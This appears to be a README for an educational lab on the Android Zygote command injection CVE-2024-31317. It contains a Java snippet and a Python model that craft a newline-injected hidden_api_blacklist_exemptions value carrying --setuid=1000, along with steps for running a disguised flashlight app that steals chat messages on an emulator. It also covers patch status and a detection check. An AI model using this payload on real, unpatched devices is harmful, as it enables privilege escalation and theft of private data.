This lab demonstrates CVE-2024-31317, a critical Android vulnerability (Zygote command injection through the `hidden_api_blacklist_exemptions` global setting) that lets a malicious app holding `WRITE_SECURE_SETTINGS` escalate to the SYSTEM user (UID 1000), bypass the per-app sandbox and read another application's data in real time.
| Stage | Description | Visual |
|---|---|---|
| 1 | User installs innocent-looking "Flashlight Pro" app | 🔦 |
| 2 | App exploits CVE-2024-31317 to gain SYSTEM access | 💉 |
| 3 | SYSTEM-level service reads "SecureChat" messages | 👁️ |
| 4 | Stolen messages appear on live dashboard | 📊 |
```text
ZygoteExploitDemo/
├── 📱 apps/
│   ├── SecureChat/          # Victim app (Jetpack Compose)
│   │   ├── Encrypted messages stored in SQLite
│   │   └── Simulates WhatsApp-style encryption
│   │
│   ├── FlashlightPro/       # Malicious app with exploit
│   │   ├── Normal flashlight UI (distraction)
│   │   ├── Background exploit service
│   │   └── WRITE_SECURE_SETTINGS permission
│   │
│   └── MonitorService/      # SYSTEM-level reader
│       ├── Runs with UID 1000 after exploit
│       ├── Reads SecureChat database
│       └── Exfiltrates to dashboard
│
├── 📊 dashboard/            # Flask web dashboard
│   └── app.py               # Shows stolen messages live
│
├── 📜 scripts/              # Automation scripts
│   ├── setup_vulnerable_emulator.sh
│   ├── build_all_apps.sh
│   ├── install_all_apps.sh
│   ├── run_exploit.py
│   └── monitor_logs.sh
│
├── 🎯 exploits/             # Exploit information
│   ├── CVE-2024-31317.md
│   └── payloads.txt
│
└── 📁 tamplates/            # Code templates
    ├── exploit_template.java
    └── dashboard_template.html
```
CVE-2024-31317 is a command injection in the channel between `system_server` and Zygote. `system_server` forwards the `hidden_api_blacklist_exemptions` global setting to Zygote over a line-oriented socket protocol (an argument count on the first line, then one argument per line), and before the June 2024 fix it wrote each exemption without checking for embedded newlines. A setting value containing `\n` therefore terminates the legitimate command early, and the remaining lines are parsed as a second Zygote command with attacker-chosen arguments such as `--setuid=`. Writing the setting requires `WRITE_SECURE_SETTINGS`, a signature/privileged/development-level permission that an ordinary app only holds if it was granted out of band (for example `adb shell pm grant <package> android.permission.WRITE_SECURE_SETTINGS`); on a real device that grant is the gating step.

Attack Vector:
```java
Settings.Global.putString(
    contentResolver,
    "hidden_api_blacklist_exemptions",
    "LClass1;->method1(\n" +   // last argument of the legitimate exemptions command
    "7\n" +                     // argument count of the injected command that follows
    "--setuid=1000\n" +         // run as SYSTEM
    "--setgid=1000\n" +         // run as SYSTEM group
    "--invoke-with\n" +         // next argument is the wrapper command Zygote execs
    "am start-service ...;\n"
);
```

| Version | Status |
|---|---|
| Android 9 - 14, security patch level before 2024-06-05 | ❌ Vulnerable |
| Android 12 - 14, security patch level 2024-06-05 or later | ✅ Patched (June 2024 security bulletin) |
| Android 15+ | ✅ Ships with the fix |

The June 2024 bulletin delivered the fix for Android 12 through 14; older releases are out of support and stay vulnerable unless the OEM backports the patch.
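To make the line-oriented protocol concrete, the following Python models it end to end. This is an added example, not code from ZygoteExploitDemo or from AOSP: it reproduces the count-then-arguments wire format of Zygote's command socket and the unchecked writer on the `system_server` side, parses the result the way Zygote does, and contrasts it with a writer that refuses embedded newlines. The injected argument list (`INJECTED_ARGS`), the class name `com.example.Payload` and the benign sample exemptions are constructed for illustration; real exploitation needs a complete Zygote argument list and depends on when `system_server` pushes the setting to Zygote, neither of which is modelled here.

```python
"""Model of the system_server -> Zygote command channel abused by
CVE-2024-31317.  Added example: pure Python, constructed data, no device.
"""
from typing import List

# Constructed illustration of what an app holding WRITE_SECURE_SETTINGS
# could store in hidden_api_blacklist_exemptions.  The argument list and
# class name are hypothetical, not a working Zygote launch spec.
INJECTED_ARGS = [
    "--runtime-args",
    "--setuid=1000",          # SYSTEM uid
    "--setgid=1000",          # SYSTEM gid
    "com.example.Payload",    # hypothetical class to run
]
MALICIOUS_SETTING = (
    "LClass1;->method1(\n"                 # satisfies the legitimate command
    + str(len(INJECTED_ARGS)) + "\n"       # count line of the injected command
    + "\n".join(INJECTED_ARGS)             # its arguments, one per line
)
# Constructed benign value: comma-separated single-line signatures.
BENIGN_SETTING = "Landroid/app/Foo;->bar()V,Lcom/example/Bar;->baz()"


def encode_exemptions_vulnerable(setting_value: str) -> str:
    """Pre-fix behaviour of ZygoteProcess.maybeSetApiDenylistExemptions:
    split the setting on ',' and write
    "<count>\\n--set-api-denylist-exemptions\\n<entry>\\n..." with no check
    for line terminators inside an entry."""
    exemptions = setting_value.split(",") if setting_value else []
    lines = [str(len(exemptions) + 1), "--set-api-denylist-exemptions", *exemptions]
    return "\n".join(lines) + "\n"


def encode_exemptions_hardened(setting_value: str) -> str:
    """Same writer with the invariant the protocol needs: an entry may
    never contain a line terminator, so it can never span lines."""
    exemptions = setting_value.split(",") if setting_value else []
    for entry in exemptions:
        if "\n" in entry or "\r" in entry:
            raise ValueError("embedded newline in hidden API exemption: %r" % entry)
    return encode_exemptions_vulnerable(setting_value)


def parse_zygote_commands(stream: str) -> List[List[str]]:
    """Read the socket the way Zygote does: one line holding the argument
    count, then that many argument lines, repeated until the data ends."""
    lines = stream.splitlines()
    commands, pos = [], 0
    while pos < len(lines):
        argc = int(lines[pos])
        args = lines[pos + 1 : pos + 1 + argc]
        if len(args) != argc:
            raise ValueError("truncated command at line %d" % pos)
        commands.append(args)
        pos += 1 + argc
    return commands


def exemptions_setting_is_suspicious(setting_value: str) -> bool:
    """Triage check for a value read back from a device: legitimate
    entries are single-line signatures, so any line terminator is a red flag."""
    return "\n" in setting_value or "\r" in setting_value


if __name__ == "__main__":
    for label, value in (("benign", BENIGN_SETTING), ("malicious", MALICIOUS_SETTING)):
        commands = parse_zygote_commands(encode_exemptions_vulnerable(value))
        print("%s setting -> %d Zygote command(s): %s" % (label, len(commands), commands))
    try:
        encode_exemptions_hardened(MALICIOUS_SETTING)
    except ValueError as err:
        print("hardened writer refused it:", err)
```

Run it directly to see the benign value yield one command and the malicious value yield two, the second carrying `--setuid=1000`. The `exemptions_setting_is_suspicious` check is the triage test to apply to the value returned by `adb shell settings get global hidden_api_blacklist_exemptions` on a device under investigation.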
- ✅ Android Studio (latest)
- ✅ Python 3.8+ with Flask
- ✅ Android SDK with platform tools
- ✅ 10GB free disk space for emulator
```bash
git clone https://github.com/GitAmanS/ZygoteExploitDemo.git
cd ZygoteExploitDemo
cd scripts
chmod +x *.sh
./setup_vulnerable_emulator.sh

# Start the emulator
emulator -avd vulnerable_android_12
```

In a new terminal:

```bash
cd ZygoteExploitDemo/scripts
./build_all_apps.sh
./install_all_apps.sh

cd ../dashboard
pip3 install flask flask-cors
python3 app.py
```

📱 Open http://localhost:5000 in your browser

```bash
cd ../scripts
python3 run_exploit.py
```

- Open the SecureChat app in the emulator
- Send some test messages
- Watch them appear on the dashboard instantly! 🔴
🎬 Demo video coming soon
- FlashlightPro holds the `WRITE_SECURE_SETTINGS` permission. This is a signature/privileged/development-level permission, so an ordinary app only gets it through an out-of-band grant such as `adb shell pm grant <package> android.permission.WRITE_SECURE_SETTINGS`; on a real device that grant is the gating step
- The exploit code writes a payload with embedded newlines into the `hidden_api_blacklist_exemptions` global setting
- `system_server` forwards the setting to Zygote, which parses the smuggled lines as a new command and spawns MonitorService with SYSTEM privileges (UID 1000)
- The SYSTEM service bypasses the per-app sandbox restrictions
- Direct database read from `/data/data/com.securechat/databases/`
- Exfiltration to the Flask dashboard via HTTP POST
- Real-time display of the stolen encrypted messages
Contributions are welcome! Please:
- Fork the repository
- Create a feature branch
- Submit a Pull Request
Areas for contribution:
- 🎯 Additional exploit payloads
- 🛡️ Better detection methods
- 📖 Improved documentation
- 🌍 Translation to other languages
MIT License - See LICENSE file for details
Aman - @GitAmanS
If you found this educational, please give it a star! ⭐
Made for security researchers, by a security researcher
Remember: With great power comes great responsibility 🕷️